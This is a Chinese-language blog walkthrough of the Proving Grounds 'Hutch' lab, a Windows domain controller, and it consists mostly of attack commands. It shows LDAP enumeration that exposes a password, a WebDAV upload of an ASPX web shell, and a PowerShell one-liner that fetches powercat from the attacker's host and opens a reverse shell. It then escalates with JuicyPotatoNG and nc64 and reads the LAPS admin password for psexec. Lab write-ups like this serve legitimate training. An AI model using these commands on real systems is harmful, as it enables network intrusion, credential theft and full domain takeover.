Proving Grounds Practice : Hutch Walkthrough
Proving Grounds Practice : Hutch Walkthrough
Foothole (立足點 ) :
- 枚舉時發現 80 Port 網站且支援 WebDAV 的方式使用,但需要經過驗證才能用
- 後續透過 nmap 帶 script 列舉網域名稱然後使用 ldapsearch 找到某個使用者描述欄位有寫密碼
- 80 Port 網站有支援 WebDAV
- 使用 cadaver 帶驗證上傳 cmdasp.aspx 後執行命令建立 reverse shell
PE ( 提權 ) :
- SeImpersonatePrivilege 標準作業,使用 JuicyPotatoNG.exe 提權
注意事項 :
- WebDAV 學習,nmap 若 Timeout 會沒有掃到
- cadaver 指令使用
- LAPS 的提權應用
Kali IP : 192.168.45.204
靶機 IP : 192.168.167.122
第一步掃 Port,└─$ rustscan -a 192.168.167.122 --scripts none --ulimit 5000 | tee rustscan
有 53、88、135、139、445、3268/3269 看來是一台 DC
snmp,└─$ sudo nmap -sU -p 161 192.168.167.122 | tee snmp,filtered 看來沒戲LDAP 進階搜尋物件,└─$ ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.167.122" "(objectclass=*)"
獲得使用者清單 : opatry、ltaunton、acostello、jsparwell、oknee、jmckendry、avictoria、jfrarey、eaburrow、cluddy、agitthouse、fmcsorley
同時看一下有無描述說明,└─$ cat ldapobject| grep "sAMAccountName\|description"
vi 進去看一下是哪個使用者,發現是 fmcsorley
獲得帳號密碼 fmcsorley:CrabSharkJellyfish192
crackmapexec 測試看看,└─$ crackmapexec smb 192.168.167.122 -u 'fmcsorley' -p 'CrabSharkJellyfish192'
smb 進去列舉,└─$ smbclient //192.168.167.122/sysvol -U "hutch\\fmcsorley" --password="CrabSharkJellyfish192"
80 /
80 /robots.txt
gobuster 沒有甚麼發現,└─$ gobuster -w ./dirfuzzing.txt dir -u http://192.168.167.122 -c -t 150 -x txt,pdf,git,aspx | tee gobuster
接著使用 kali 好用的工具 Cadaver,參考 : cadaver | Kali Linux Tools
可以走在 HTTP Protocol 上好用的檔案下載上傳工具
標準作業 Powershell 建立 Reverse Shell 吧
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.167/powercat.ps1'); powercat -c 192.168.45.167 -p 4444 -e powershell"
4444 listener 直接進來了
開始 PE,whoami /priv 發現 SeImpersonatePrivilege Enabled
標準作業 JuicyPotatoNG.exe 提權,c:\Users\Public\JuicyPotatoNG.exe -t * -p c:\Users\Public\nc64.exe -a "192.168.45.167 4446 -e c:\windows\system32\cmd.exe"
拿到管理者了,結束這回合
補充說明 :
在這一台靶機上有發現安裝 LAPS : Microsoft 的本機管理員密碼解決方案 (LAPS)
可以透過 ldapsearch 探索密碼
ldapsearch -x -H 'ldap://192.168.167.122' -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
獲得密碼 ms-Mcs-AdmPwd: U(0xF&Y3t#P65;
直接 impacket-psexec ,└─$ impacket-psexec administrator:'U(0xF&Y3t#P65;'@192.168.167.122
留言
張貼留言